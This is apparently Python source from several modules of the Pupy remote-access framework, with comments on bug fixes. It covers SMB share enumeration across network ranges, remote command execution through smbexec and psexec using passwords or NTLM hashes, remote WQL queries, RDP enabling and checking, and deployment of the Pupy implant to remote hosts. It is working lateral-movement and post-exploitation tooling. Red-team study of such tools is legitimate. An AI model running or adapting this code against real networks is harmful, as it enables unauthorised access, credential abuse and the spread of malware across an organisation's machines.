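    def run(self, args):
        """Enumerate shared folders, either on the local client or on remote hosts.

        Local mode (``args.local``) asks the Windows-side ``pupwinutils.drives``
        helper for the client's own shares; on any other platform only a
        warning is printed.  Remote mode requires ``args.target`` (one host, or
        a CIDR network that is expanded with ``IPNetwork``) and queries every
        host through the ``pupyutils.share_enum`` helper: a result carrying an
        ``error`` key is reported with ``self.error``, otherwise a success line
        and a SHARE/ACCESS table are printed.
        """
        # The local branch always returns here.  Previously the ``return`` sat
        # inside a bare ``except: pass`` together with the lookup, so a failing
        # local lookup was swallowed and execution fell through into the
        # remote path.
        if args.local:
            try:
                if self.client.is_windows():
                    # Parenthesised form prints the same single value on
                    # Python 2 and 3.
                    print(self.client.conn.modules[
                        'pupwinutils.drives'].shared_folders())
                else:
                    self.warning(
                        'this module works only for windows. Try using: run shares remote -t 127.0.0.1'
                    )
            except Exception as e:
                # Report rather than hide the failure, as the sibling modules do.
                self.error(e)
            return

        if not args.target:
            self.error("target (-t) parameter must be specify")
            return

        # A CIDR target expands to every address of the network.
        if "/" in args.target:
            hosts = IPNetwork(args.target)
        else:
            hosts = [args.target]

        connect = self.client.remote('pupyutils.share_enum', 'connect')

        for host in hosts:
            result = connect(str(host), args.port, args.user, args.passwd,
                             args.hash, args.domain)

            if 'error' in result:
                # The error record may or may not carry OS/NAME details.
                if 'os' in result:
                    self.error('{}:{} OS={} NAME={}: {}'.format(
                        host, args.port, result['os'], result['name'],
                        result['error']))
                else:
                    self.error('{}:{}: {}'.format(host, args.port,
                                                  result['error']))
                continue

            self.success('{}:{} OS=[{}] NAME=[{}] AUTH={}'.format(
                host, args.port, result['os'], result['name'],
                result['auth']))
            shares = [{
                'SHARE': entry[0],
                'ACCESS': entry[1]
            } for entry in result['shares']]

            self.table(shares, ['SHARE', 'ACCESS'])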
    def run(self, args):
        """Run ``args.command`` on each target host through the ``smbexec`` helper.

        ``args.target[0]`` is a single host or a CIDR network (expanded with
        ``IPNetwork``).  The special commands ``pupy86``/``pupy32``/``pupy64``
        are handed to ``powerloader.serve`` instead and the completion objects
        it returns are waited on once every host has been processed.  For any
        other command the helper's output goes to ``self.log`` and its error
        text to ``self.error``.
        """
        target = args.target[0]
        hosts = IPNetwork(target) if "/" in target else [target]

        smbexec = self.client.remote('pupyutils.psexec', 'smbexec')
        pending = []
        serve_pupy = args.command in ('pupy86', 'pupy32', 'pupy64')

        for host in hosts:
            hostname = str(host)

            if serve_pupy:
                _, completion = powerloader.serve(
                    self,
                    self.client.get_conf(),
                    host=hostname,
                    port=args.port,
                    user=args.user,
                    domain=args.domain,
                    password=args.passwd,
                    ntlm=args.hash,
                    execm=args.execm,
                    timeout=args.timeout,
                    arch='x64' if args.command == 'pupy64' else 'x86')
                pending.append(completion)
                continue

            output, error = smbexec(hostname, args.port, args.user,
                                    args.domain, args.passwd, args.hash,
                                    args.command, args.share, args.execm,
                                    args.codepage, args.timeout,
                                    not args.noout)

            if output:
                self.log(output)

            if error:
                self.error(error)

        if not pending:
            return

        self.info('Wait for completions')
        for completion in pending:
            if not completion.is_set():
                completion.wait()
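    def run(self, args):
        """Execute a WQL query on each target host and print the result.

        ``args.query`` (a list of words) is joined into the query text; when it
        is empty a default query against ``Win32_WMISetting`` is used.
        ``args.target[0]`` is a single host or a CIDR network (expanded with
        ``IPNetwork``).  A one-column result is printed as a ``List``, a single
        row as KEY/VALUE pairs, and anything larger as a full ``Table``.  An
        exception raised for one host is reported with ``self.error`` and the
        remaining hosts are still queried.
        """
        wql = self.client.remote('pupyutils.psexec', 'wql')

        if args.query:
            cmdline = ' '.join(args.query)
        else:
            cmdline = 'SELECT DatabaseDirectory,BuildVersion,LoggingDirectory '\
              'FROM Win32_WMISetting'

        target = args.target[0]
        hosts = IPNetwork(target) if "/" in target else [target]

        for host in hosts:
            try:
                columns, values = wql(str(host), args.port, args.user,
                                      args.domain, args.passwd, args.hash,
                                      cmdline, args.timeout)

                # An empty result used to ``return`` here, which silently
                # skipped every remaining host of a network target.
                if not columns:
                    continue

                if len(columns) == 1:
                    self.log(
                        List([_stringify(x[0]) for x in values],
                             caption=columns[0]))
                elif not values:
                    continue
                elif len(values) == 1:
                    records = [{
                        'KEY': column,
                        'VALUE': _stringify(values[0][idx])
                    } for idx, column in enumerate(columns)]
                    self.log(Table(records, ['KEY', 'VALUE']))
                else:
                    records = [{
                        column: _stringify(value[idx])
                        for idx, column in enumerate(columns)
                    } for value in values]
                    self.log(Table(records, columns))

            except Exception as e:
                # Keep the same wide net as before: formatting failures are
                # reported per host as well, not only the remote call.
                self.error(e)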
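    def run(self, args):
        """Run ``args.command`` on each target host via the ``smbexec`` helper.

        ``args.target[0]`` is a single host or a CIDR network (expanded with
        ``IPNetwork``).  The helper's output goes to ``self.log`` and any
        error text to ``self.error``.
        """
        target = args.target[0]
        hosts = IPNetwork(target) if "/" in target else [target]

        smbexec = self.client.remote('pupyutils.psexec', 'smbexec')

        for host in hosts:
            # Network targets iterate as address objects; the sibling modules
            # hand the helper a plain string, so do the same here instead of
            # passing the object through unchanged.
            output, error = smbexec(str(host), args.port, args.user, args.domain,
                                    args.passwd, args.hash, args.command,
                                    args.share, args.execm, args.codepage,
                                    args.timeout, not args.noout)

            if output:
                self.log(output)

            if error:
                self.error(error)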
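    def run(self, args):
        """Manage RDP: toggle it on the local Windows client, or check remote hosts.

        With ``args.local`` and ``args.enable``/``args.disable`` the
        ``pupwinutils.rdp`` helper is used; the client must be Windows and its
        ``check_if_admin`` must succeed, otherwise an error is reported and
        nothing is changed.  With ``args.remote`` every host in
        ``args.target[0]`` (a single host or a CIDR network expanded with
        ``IPNetwork``) is checked through ``pupyutils.rdp_check``.
        """
        # TO DO: enable multi RDP session, see MIMIKATZ for example

        if args.local:
            if args.enable or args.disable:
                if not self.client.is_windows():
                    self.error(
                        "This option could be used only on windows hosts")
                    return

                rdp = self.client.conn.modules["pupwinutils.rdp"]

                # Previously there was no return here, so the enable/disable
                # call still ran after the failed admin check.
                if not rdp.check_if_admin():
                    self.error("Admin privileges are required")
                    return

                with redirected_stdio(self):
                    if args.enable:
                        rdp.enable_rdp()

                    if args.disable:
                        rdp.disable_rdp()

        elif args.remote:
            # ``args.target`` is a list; the original appended the whole list
            # as one "host" in the non-CIDR case while the CIDR check already
            # used ``args.target[0]``.
            target = args.target[0]
            hosts = IPNetwork(target) if "/" in target else [target]

            for host in hosts:
                with redirected_stdio(self):
                    self.client.conn.modules["pupyutils.rdp_check"].check_rdp(
                        host, args.username, args.password, args.domain,
                        args.hashes)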
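    def run(self, args):
        """Run ``args.command`` on each target host via the ``psexec`` helper.

        ``args.target[0]`` is a single host or a CIDR network (expanded with
        ``IPNetwork``).  The special commands ``pupy86``/``pupy32``/``pupy64``
        go through ``powerloader.serve``; any other command is executed with
        ``psexec``, which delivers output to ``_on_data`` and signals the end
        of the run through ``_on_complete``.  Every host gets an ``Event`` that
        is set on completion, and the method blocks at the end until all
        pending events are set.
        """
        target = args.target[0]
        hosts = IPNetwork(target) if "/" in target else [target]

        psexec = self.client.remote('pupyutils.psexec', 'psexec', False)

        completions = []

        def _make_callbacks(hostname, completion):
            # Bind ``hostname`` and ``completion`` per host.  Closures over the
            # loop variables would see whichever host the loop had moved on to
            # by the time psexec calls back, and could set the wrong event.
            def _on_data(data):
                if args.verbose:
                    self.log(u'{}:{}: {}'.format(hostname, args.port, data))
                else:
                    self.stdout.write(data)

            def _on_complete(message):
                try:
                    if message:
                        self.error(message)
                    elif args.verbose:
                        # Was ``message and args.verbose``, which can never be
                        # true once the branch above has rejected ``message``.
                        self.info('Completed')
                finally:
                    completion.set()

            return _on_data, _on_complete

        for host in hosts:
            hostname = str(host)

            if args.command in ('pupy86', 'pupy32', 'pupy64'):
                _, completion = powerloader.serve(
                    self,
                    self.client.get_conf(),
                    host=hostname,
                    port=args.port,
                    user=args.user,
                    domain=args.domain,
                    password=args.passwd,
                    ntlm=args.hash,
                    execm=args.execm,
                    timeout=args.timeout,
                    arch='x64' if args.command == 'pupy64' else 'x86')

                if completion:
                    completions.append(completion)

                continue

            completion = Event()
            on_data, on_complete = _make_callbacks(hostname, completion)

            psexec(hostname, args.port, args.user, args.domain, args.passwd,
                   args.hash, args.command, args.execm, args.codepage,
                   args.timeout, not args.noout, None, on_data, on_complete,
                   args.verbose)

            completions.append(completion)

        if completions:
            if args.verbose:
                self.info('Wait for completions')
            for completion in completions:
                if not completion.is_set():
                    completion.wait()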